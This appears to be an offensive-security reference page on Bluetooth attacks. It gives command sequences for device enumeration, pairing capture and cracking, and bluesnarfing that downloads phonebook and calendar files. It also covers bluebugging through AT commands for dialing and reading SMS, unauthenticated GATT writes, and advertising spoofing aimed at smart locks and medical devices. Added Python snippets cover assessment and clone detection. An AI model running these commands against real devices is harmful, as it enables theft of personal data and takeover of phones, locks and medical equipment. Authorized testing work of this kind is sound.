# Bluetooth Attacks

## Overview
Bluetooth is a short-range wireless protocol used by billions of devices for audio, data transfer, peripherals, and IoT connectivity. Bluetooth Classic (BR/EDR) and Bluetooth Low Energy (BLE) have distinct attack surfaces. Classic Bluetooth is vulnerable to pairing exploitation, eavesdropping, and device hijacking, while BLE is vulnerable to enumeration, GATT service exploitation, and advertising spoofing.
## Attack Decision Tree

- Bluetooth target identified?
  - Bluetooth Classic (BR/EDR)
    - Discoverable device --> [Enumeration](#discovery-and-enumeration)
    - Unknown device --> Brute-force inquiry
    - Pairing exploit --> [Classic Pairing Attacks](#classic-pairing-attacks)
    - Bluesnarfing / Bluebugging --> [Data Extraction](#bluesnarfing-and-bluebugging)
  - Bluetooth Low Energy (BLE)
    - Advertising device --> BLE enumeration
    - GATT services --> [GATT Exploitation](#ble-gatt-exploitation)
    - Spoofing target --> [BLE Spoofing](#ble-advertising-spoofing)
  - Ubertooth available?
    - Full sniffing capability --> [Ubertooth Sniffing](#ubertooth-sniffing)
    - No Ubertooth --> Limited to active scanning
## Discovery and Enumeration

### Bluetooth Classic Discovery

```bash
# Basic device discovery (inquiry plus remote name requests)
sudo hcitool scan
# Raw inquiry (prints BD_ADDR, clock offset and device class; no names)
sudo hcitool inq
# Scan for BLE advertisers (BLE only, runs until interrupted; see BLE Discovery below)
sudo hcitool lescan
# Device information (name, LMP version, manufacturer, supported features)
sudo hcitool info <BD_ADDR>
# SDP (Service Discovery Protocol) enumeration
sdptool records <BD_ADDR>
# Browse SDP records
sdptool browse <BD_ADDR>
```
### BLE Discovery

```bash
# BLE device discovery
sudo hcitool lescan
# Detailed BLE scan with bettercap
sudo bettercap -iface hci0
> ble.recon on
> ble.show
# Connect to BLE device and enumerate services
gatttool -b <BD_ADDR> -I
> connect
> primary
> characteristics
> char-desc
> char-read-hdl 0x0001
```
### Automated Discovery Tools

```bash
# bluelog - Automated Bluetooth discovery
sudo bluelog -i hci0 -o bluetooth_devices.log
# btscanner - Interactive Bluetooth scanner
sudo btscanner -i hci0
# Bettercap - Comprehensive BLE scanner
sudo bettercap -iface hci0
> ble.recon on
> ble.show
```
## Classic Pairing Attacks

### Legacy Pairing (PIN/Passkey)

Legacy Bluetooth pairing uses a 4-8 digit PIN that's transmitted with minimal protection. The PIN can be cracked offline.

```bash
# Capture pairing exchange with Ubertooth
ubertooth-rx -f -c pairing_capture.pcap
# Crack the pairing from the captured exchange. crackle's -o writes a decrypted pcap,
# not a text file, and it works on BLE legacy pairing (SMP) captures
crackle -i pairing_capture.pcap -o decrypted.pcap
# hashcat ships no Bluetooth PIN mode: mode 19500 is Ruby on Rails Restful-Authentication,
# so there is no hashcat invocation for a captured Bluetooth pairing
```
### Secure Simple Pairing (SSP) - Just Works

The "Just Works" SSP association model provides no MITM protection and is vulnerable to passive eavesdropping if the pairing exchange is captured.

```bash
# Capture SSP pairing with Ubertooth
ubertooth-rx -f -c ssp_capture.pcap
# SSP "Just Works" can be brute-forced with the captured nonce
# The pairing verification value can be computed offline
```
### Bluetooth PIN Cracking

```bash
# Using crackle for legacy pairing (BLE SMP legacy pairing; prints the recovered TK/LTK)
crackle -i paired.pcap
# Using BtCrack (GPU-accelerated)
# git clone https://github.com/omri-borovik/BtCrack.git
# Requires: captured pairing exchange
# hashcat: there is no Bluetooth PIN mode. Mode 19500 is Ruby on Rails Restful-Authentication,
# so "hashcat -m 19500 captured_hash.txt wordlist.txt" does not crack Bluetooth PINs
```
## Bluesnarfing and Bluebugging

### Bluesnarfing (Data Theft)

Bluesnarfing exploits the OBEX Push service to read files from a target device without authentication.

```bash
# Check for OBEX Push service
sdptool records <BD_ADDR> | grep -A5 "OBEX Object Push"
# Bluesnarfing tool
# Requires: obexftp, bluesnarf
# List directory contents
obexftp -b <BD_ADDR> -c / -l
# Download specific files
obexftp -b <BD_ADDR> -c / -g telecom/cal.txt
obexftp -b <BD_ADDR> -c / -g telecom/pb.txt
```
### Bluebugging (Remote Control)

Bluebugging exploits the RFCOMM serial port to send AT commands, enabling call interception and device control.

```bash
# Bind an RFCOMM tty (rfcomm0) to channel 1 on the target; the first argument is the
# local rfcomm device, not the HCI adapter
rfcomm connect rfcomm0 <BD_ADDR> 1
# Or use bluebugger (-d selects the local HCI adapter, -c the RFCOMM channel)
bluebugger -d hci0 -a <BD_ADDR> info
# AT commands for call control:
# ATD<number>; - Dial a number
# AT+CLCC - List current calls
# ATH - Hang up
# AT+CPBR=1,100 - Read phone book entries
# AT+CMGR=1 - Read SMS message #1
```
## BLE GATT Exploitation

### GATT Service Enumeration

```bash
# Connect and enumerate all GATT services and characteristics
gatttool -b <BD_ADDR> -I
> connect
> primary
> characteristics
> char-desc
# Read all readable characteristics
gatttool -b <BD_ADDR> --char-read -a 0x0001
# Write to a writable characteristic (test for unauthorized writes)
gatttool -b <BD_ADDR> --char-write-req -a 0x0025 -n 0100
# Read characteristic value
gatttool -b <BD_ADDR> --char-read -a 0x0025
```
### Common GATT Vulnerabilities

| Vulnerability | Description | Impact |
|---|---|---|
| Unauthenticated reads | Characteristics readable without bonding | Data leakage |
| Unauthenticated writes | Characteristics writable without bonding | Device control |
| Sensitive data in cleartext | No encryption on GATT operations | Eavesdropping |
| Hardcoded credentials | Default PINs or tokens in characteristics | Authentication bypass |
| Insecure firmware updates | OTA updates without signature verification | Firmware modification |
| Missing rate limiting | No limit on characteristic write frequency | DoS |
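As an added example (not code from the page, from BlueZ or from gatttool), the following Python parses the lines gatttool's `characteristics` command prints during the enumeration above, decodes the property bits, and lists the value handles an assessment has to probe for the "Unauthenticated writes" row of the table; the sample output is constructed, and the ATT error mapping covers the responses a server gives when a write runs into its bonding requirement.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Characteristic property bits (Bluetooth Core Spec, Vol 3 Part G, 3.3.1.1)
PROPERTY_BITS = {0x01: "broadcast", 0x02: "read", 0x04: "write-without-response", 0x08: "write",
                 0x10: "notify", 0x20: "indicate", 0x40: "authenticated-signed-writes", 0x80: "extended-properties"}
# ATT error codes a server returns when a write runs into a security requirement
ATT_ERRORS = {0x03: "write-not-permitted", 0x05: "insufficient-authentication",
              0x08: "insufficient-authorization", 0x0F: "insufficient-encryption"}
BASE_UUID_SUFFIX = "-0000-1000-8000-00805f9b34fb"
# One line per characteristic, in the format gatttool's "characteristics" command prints
LINE_RE = re.compile(r"handle = (0x[0-9a-f]{4}), char properties = (0x[0-9a-f]{2}), "
                     r"char value handle = (0x[0-9a-f]{4}), uuid = ([0-9a-f-]+)")

@dataclass
class Characteristic:
    decl_handle: int
    value_handle: int
    uuid: str
    properties: List[str]

def short_uuid(uuid: str) -> str:
    """UUIDs from the Bluetooth base range are shown in 16-bit form (0x2a00); others unchanged."""
    return "0x" + uuid[4:8] if uuid.startswith("0000") and uuid.endswith(BASE_UUID_SUFFIX) else uuid

def parse_gatttool_output(text: str) -> List[Characteristic]:
    return [Characteristic(int(m[1], 16), int(m[3], 16), short_uuid(m[4]),
                           [name for bit, name in PROPERTY_BITS.items() if int(m[2], 16) & bit])
            for m in LINE_RE.finditer(text)]

def plain_writable(chars: List[Characteristic]) -> List[Characteristic]:
    """Characteristics that accept unsigned writes. The property bits only say what the
    characteristic supports; whether bonding is required is enforced by the server and only
    shows up as an ATT error on the attempt, so these are the value handles to verify."""
    return [c for c in chars if {"write", "write-without-response"} & set(c.properties)
            and "authenticated-signed-writes" not in c.properties]

def classify_write_result(att_error: Optional[int]) -> str:
    """Turn the outcome of a write attempted before bonding into an assessment verdict."""
    if att_error is None:
        return "unauthenticated write accepted"  # finding: the 'Unauthenticated writes' row above
    return ATT_ERRORS.get(att_error, f"rejected (ATT error 0x{att_error:02x})")

# Constructed sample output, not from a real device; handle 0x0025 mirrors the page's example
SAMPLE = """\
handle = 0x0002, char properties = 0x02, char value handle = 0x0003, uuid = 00002a00-0000-1000-8000-00805f9b34fb
handle = 0x0004, char properties = 0x0a, char value handle = 0x0005, uuid = 00002a01-0000-1000-8000-00805f9b34fb
handle = 0x0024, char properties = 0x1c, char value handle = 0x0025, uuid = 6e400002-b5a3-f393-e0a9-e50e24dcca9e
"""
```

A write that succeeds before bonding (`classify_write_result(None)`) is the finding; an `insufficient-authentication` or `insufficient-encryption` error means the server is enforcing the requirement the properties alone cannot show.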
### BLE Exploitation with Bettercap

```bash
# Start bettercap BLE scanning
sudo bettercap -iface hci0
# Discover BLE devices
> ble.recon on
> ble.show
# Enumerate a specific device
> ble.enum <BD_ADDR>
# Read a characteristic
> ble.read <BD_ADDR> <UUID>
# Write to a characteristic
> ble.write <BD_ADDR> <UUID> <HEX_DATA>
```
## BLE Advertising Spoofing

BLE advertising packets are broadcast unencrypted, allowing an attacker to spoof device advertisements.

```bash
# BLE advertising spoofing with Bettercap
sudo bettercap -iface hci0
# Configure the spoofed advertisement, then enable it
> set ble.spoof.address <SPOOFED_MAC>
> set ble.spoof.advertising_data <HEX_DATA>
> ble.spoof on
# Common spoofing targets:
# - Fitness trackers (Fitbit, Garmin)
# - Smart locks (August, Kwikset)
# - Beacons (iBeacon, Eddystone)
# - Medical devices (insulin pumps, heart monitors)
```
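From the monitoring side, as an added example that is not code from the page or from bettercap: the following Python decodes raw advertising payloads into their AD structures, extracts the identity a user actually trusts (the local name, or an iBeacon UUID/major/minor), and reports identities seen from more than one address, which is what a cloned tracker, lock or beacon looks like in a scan; the observations are constructed.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple
# AD types used here (Bluetooth Core Spec Supplement, Part A)
AD_COMPLETE_LOCAL_NAME = 0x09
AD_MANUFACTURER_SPECIFIC = 0xFF
APPLE_COMPANY_ID = 0x004C       # on the air little-endian: 4c 00
IBEACON_PREFIX = b"\x02\x15"    # subtype 0x02, length 0x15 (21 bytes follow)

def parse_ad_structures(payload: bytes) -> Dict[int, bytes]:
    """Split an advertising payload into {ad_type: data}; each structure is len, type, data."""
    fields, i = {}, 0
    while i < len(payload):
        length = payload[i]
        if length == 0:          # zero-length padding ends the significant part
            break
        if i + 1 + length > len(payload):
            raise ValueError(f"truncated AD structure at offset {i}")
        fields[payload[i + 1]] = payload[i + 2:i + 1 + length]
        i += 1 + length
    return fields

def advertiser_identity(fields: Dict[int, bytes]) -> Optional[str]:
    """The identity a user or app trusts: an iBeacon UUID/major/minor, else the local name."""
    mfr = fields.get(AD_MANUFACTURER_SPECIFIC, b"")
    if len(mfr) >= 25 and int.from_bytes(mfr[:2], "little") == APPLE_COMPANY_ID and mfr[2:4] == IBEACON_PREFIX:
        uuid, major, minor = mfr[4:20].hex(), int.from_bytes(mfr[20:22], "big"), int.from_bytes(mfr[22:24], "big")
        return f"ibeacon:{uuid}:{major}:{minor}"
    name = fields.get(AD_COMPLETE_LOCAL_NAME)
    return "name:" + name.decode("utf-8", "replace") if name else None

def find_cloned_identities(observations: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """observations are (BD_ADDR, advertising payload hex). Returns identities advertised from
    more than one address. Address rotation (resolvable private addresses) also produces this
    pattern, so correlate with RSSI and timing before treating it as a spoofed advertiser."""
    seen = defaultdict(set)
    for addr, hexdata in observations:
        ident = advertiser_identity(parse_ad_structures(bytes.fromhex(hexdata)))
        if ident:
            seen[ident].add(addr.upper())
    return {ident: sorted(addrs) for ident, addrs in seen.items() if len(addrs) > 1}

# Constructed observations (not captured traffic): one lock name and one beacon each seen twice
BEACON = "1aff4c000215" + "e2c56db5dffb48d2b060d0f5a71096e0" + "0001" + "0002" + "c5"
OBSERVATIONS = [
    ("AA:BB:CC:DD:EE:01", "020106" + "0b09" + "Smart Lock".encode().hex()),
    ("AA:BB:CC:DD:EE:02", "020106" + "0b09" + "Smart Lock".encode().hex()),
    ("AA:BB:CC:DD:EE:03", "020106" + BEACON),
    ("AA:BB:CC:DD:EE:04", "020106" + BEACON),
    ("AA:BB:CC:DD:EE:05", "020106" + "0709" + "Fitbit".encode().hex()),
]
```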
## Ubertooth Sniffing

Ubertooth One is a dedicated Bluetooth sniffing tool that can capture Bluetooth traffic in promiscuous mode, including traffic between other devices.

```bash
# Install Ubertooth tools
apt install ubertooth
# Basic sniffing
ubertooth-rx -f
# Capture to pcap for Wireshark analysis
ubertooth-rx -f -c capture.pcap
# Follow a specific connection
ubertooth-follow -a <BD_ADDR>
# Capture pairing exchange
ubertooth-rx -f -c pairing.pcap
# Analyze captured data with Wireshark
wireshark capture.pcap
# Display filters: btle, btatt, btsmp, btl2cap
```
### Wireshark Bluetooth Filters

| Filter | Purpose |
|---|---|
| btle | Bluetooth Low Energy link layer |
| btatt | Bluetooth ATT (GATT) |
| btsmp | Bluetooth Security Manager Protocol |
| btl2cap | Bluetooth L2CAP |
| btrfcomm | RFCOMM (serial port) |
| obex | OBEX (file transfer) |
| bthci_cmd | HCI commands |
| bthci_evt | HCI events |
## Practical: Bluetooth Assessment Methodology

- Discovery: Use `hcitool scan`, `hcitool lescan`, and bettercap to enumerate all Bluetooth devices
- Service enumeration: Use `sdptool records` and `gatttool` to enumerate all services and characteristics
- Authentication testing: Test each service for authentication requirements
- Data extraction: Attempt to read all readable characteristics without authentication
- Write testing: Attempt to write to all writable characteristics without authentication
- Pairing testing: Attempt pairing with default PINs (0000, 1234, 1111)
- Eavesdropping: Use Ubertooth to capture and analyze Bluetooth traffic
- Report findings: Document all vulnerabilities with screenshots and packet captures
## Common Pitfalls

- Bluetooth adapter limitations: Internal laptop Bluetooth adapters often don't support promiscuous mode or BLE sniffing. Use a dedicated adapter (CSR8510, Ubertooth).
- Range limitations: BT Classic range is ~10m (Class 2) or ~100m (Class 1). BLE range is ~50-100m.
- Pairing history: Previously paired devices may auto-reconnect. Clear pairing history before testing.
- BLE version differences: BLE 4.0, 4.1, 4.2, 5.0 have different security features. Test the specific version.
- Device responsiveness: Some devices enter low-power mode and stop advertising. Use active scanning to wake them.
## OPSEC Considerations

- Bluetooth scanning is detectable by devices in discoverable mode
- Active pairing attempts are logged by some devices
- Ubertooth transmissions are visible to other Bluetooth sniffers
- Bluesnarfing and bluebugging are illegal without authorization
- Medical device testing (insulin pumps, pacemakers) carries extreme risk
## Cross-References

- Zigbee/Z-Wave Attacks — Other short-range wireless protocols
- SDR Wireless Attacks — Sub-GHz frequency analysis
- 01 - Pre-Foothold — Wireless assessment methodology
## Tool References

| Tool | Purpose | Link |
|---|---|---|
| hcitool | Bluetooth Classic discovery | BlueZ (Linux standard) |
| gatttool | BLE GATT enumeration | BlueZ |
| bettercap | BLE scanning and exploitation | https://www.bettercap.org/ |
| Ubertooth | Bluetooth sniffing | https://github.com/greatscottgadgets/ubertooth |
| crackle | Bluetooth PIN cracking | https://github.com/mikeryan/crackle |
| bluelog | Automated BT discovery | https://github.com/jacopovalk/bluelog |
| btscanner | Interactive BT scanner | Kali Linux |
| spooftooph | Bluetooth spoofing | Kali Linux |